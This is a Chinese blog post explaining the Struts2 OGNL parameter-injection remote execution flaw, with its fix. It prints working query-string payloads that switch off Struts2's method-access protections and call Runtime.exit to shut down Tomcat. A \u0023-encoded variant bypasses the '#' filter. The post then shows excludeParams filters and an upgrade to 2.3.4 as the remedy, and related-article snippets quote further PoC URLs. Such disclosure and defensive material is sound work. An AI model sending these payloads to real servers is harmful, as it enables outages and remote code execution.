Struts2远程执行漏洞

最新推荐文章于 2022-10-29 20:42:49 发布
最新推荐文章于 2022-10-29 20:42:49 发布
阅读量188 收藏
点赞数
分类专栏: Struts2 文章标签: Struts2 java.lang.Runtime ParametersInterceptor 远程执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_33243470/article/details/84385749
版权
[size=medium][color=darkred]Struts2转码有个bug,可以导致应用挂掉(也可以执行类似 rm –rf /root,只要有权限的话)[/color]

在访问你应用的action的URL连接后面用get请求的方式带上参数[/size] 

?('\#_memberAccess[\'allowStaticMethodAccess\']')(meh)=tr&(aaa)(('\#context[\'xwork.MethodAccessor.denyMethodExecution\']\=\#foo')(\#foo\=new%20java.lang.Boolean("false")))&(asdf)(('\#rt.exit(1)')(\#rt\=@java.lang.Runtime@getRuntime()))=1

[size=medium]OGNL处理时最终的结果就是: [/size] 
java.lang.Runtime.getRuntime().exit(1);

[size=medium]就会停掉Tomcat

为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,所以上面这个参数在Struts2.1.8之后就没有效果了,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:
[/size] 

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

[size=medium]
转义后是这样: [/size] 
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

[size=medium]还是可以停掉服务器

如下图,Tomcat就直接down掉了[/size]
[img]http://dl.iteye.com/upload/attachment/0079/8619/bf966ae3-c774-35e2-b85f-e2dbf12256cb.jpg[/img]

[size=medium]
[b]解决方法:Struts2的interceptor参数过滤[/b][/size] 
<interceptor-ref name="params"> 
<param name="excludeParams">.*\\u0023.*</param> 
</interceptor-ref>

[size=medium]
但还不完全,可以这样过滤

把JAR包升级到2.3.4版本,发现struts-default.xml参数过滤是这样的:[/size] 

<interceptor-ref name="params">
    <param name="excludeParams">
dojo\..*,^struts\..*,^session\..*,^request\..*,^application\..*,^servlet(Request|Response)\..*,parameters\...*
    </param>
    </interceptor-ref>

[size=medium]
[b]而且在ParametersInterceptor拦截器里面是通过正则表达式来控制参数值[/b]:[/size]
[img]http://dl.iteye.com/upload/attachment/0079/8624/9d5b4ccc-677c-3e36-9ca9-353d5844e51f.jpg[/img]
[size=medium]这样就万无一失了,不过要注意更新JAR包的时候相关联的一系列JAR包都要覆盖。[/size]
Easyean
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2远程命令执行漏洞
mirror97black的博客
12-20 1万+
Struts2 远程命令执行漏洞
Struts2漏洞
lin062854的专栏
11-03 3347
Struts 2.3.15版本被曝出存在重要的安全漏洞,主要问题如下   1、可远程执行服务器脚本代码          用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','her
Struts2远程命令执行漏洞分析及防范
dongsheng186的专栏
04-10 686
    Struts 2是在struts 和WebWork的技术基础上进行了合并的全新的框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品.   近期Stru
java 2mi远程执行漏洞_Struts2 5个远程代码执行漏洞利用POC
weixin_28822657的博客
02-27 430
标 题: Struts2 5个远程代码执行漏洞利用POC作 者: 园长链 接: http://my.oschina.net/backtract/blog/133638利用代码: 检测是否存在:POC1:http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)((...
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 8559
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
Struts2/XWork 安全漏洞及解决办法
iteye_8053的博客
07-26 149
exploit-db网站在7月14日爆出了一个Struts2远程执行任意代码的漏洞漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability 相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ ...
Struts2远程执行漏洞 Jar包集合体
08-26
然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行(RCE)风险,使攻击者能够完全控制受影响的服务器。在给定的标题和描述中,提到了几个关键的Struts2漏洞,包括S2-057、S2-...
Struts2远程命令执行验证工具
11-22
1. **快速检测**:该工具能够迅速扫描并检测出是否存在Struts2远程命令执行漏洞,节省了手动检查的时间和精力。 2. **批量导入验证**:对于大型网络环境,支持批量导入多个目标URL,进行批量检测,提高了工作效率。...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
STRUTS2的getClassLoader漏洞利用
01-30
引用《Springframework(cve-2010-1622)漏洞利用指南》:Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]
程序世界系列之-struts2安全漏洞引发的安全杂谈(上)
weixin_33725272的博客
07-25 441
目录: 1.讨论关于struts 安全问题。 2.黑客文化。 3.如何降低安全漏洞的出现。 4.忠告建议。 题记: 这篇文章本来很早应该和大家见面的,中间由于个人原因调整了系列文章发布时间,实属罪过。为了不误导大众文章中间讲述的经历想法实战,均属个人看法个人行为不代表任何团体及组织。观看者请保留自己的想法观点!欢迎各位热爱编程的技术人员交流。废话不多,开始正文。 1.讨论...
Struts漏洞分析与研究
forbidd3n,keep going
10-13 2864
1. Apache官方公告 http://struts.apache.org/development/2.x/docs/security-bulletins.html 其中涉及代码执行漏洞有:S2-003,S2-005,S2-007,S2-008,S2-009,S2-012~S2-016,S2-20~21下面逐一简要说明。 2. 各版本漏洞分析 S2-003 受影响版本
Struts2-016命令执行漏洞
MX的博客
05-05 7505
Struts2-016命令执行漏洞 一:前言 CVE-2013-2251 漏洞概述: Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,...
struts2 的几个远程代码执行漏洞
zwjhuhu的专栏
06-28 1523
主要收集自网络 http://zone.wooyun.org/content/3880 来源: http://ahack.iteye.com/blog/1858871 http://ahack.iteye.com/blog/1873005 检测是否存在: 可能使用的代码 POC1: http://127.0.0.1/Struts2/test.action?('\43
拦截器传参问题
weixin_30267697的博客
09-14 441
虽然在书上看到了提醒,但是在编程的时候还是没想到,犯错了。 在配置拦截器或者拦截器栈的时候一定要加上defaultStack这个拦截器 加上了它就能够在拦截器中用request.setAttibute("", "")传参到Action中 “我们可以把Struts2理解成一个空容器,而大量的内建拦截器完成了该框架的大部分操作。比如params拦截器负责解析HT...
struts2远程执行漏洞学习(三)
ice
02-24 201
        这个是终结部分了。     除了#_memberAccess.allowStaticMethodAccess'是一个关键属性外,'xwork.MethodAccessor.denyMethodExecution’是另一个关键属性,意义如同名字,这个属性决定了是否可以执行方法,只有当这个属性为false时,我们才可以利用ognl自定义变量,调用一些关键的方法 例如FileWrite...
飞机大战系列 Space War1.0(免费,开源)
最新发布
07-14
飞机大战系列 Space War1.0(免费,开源)
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值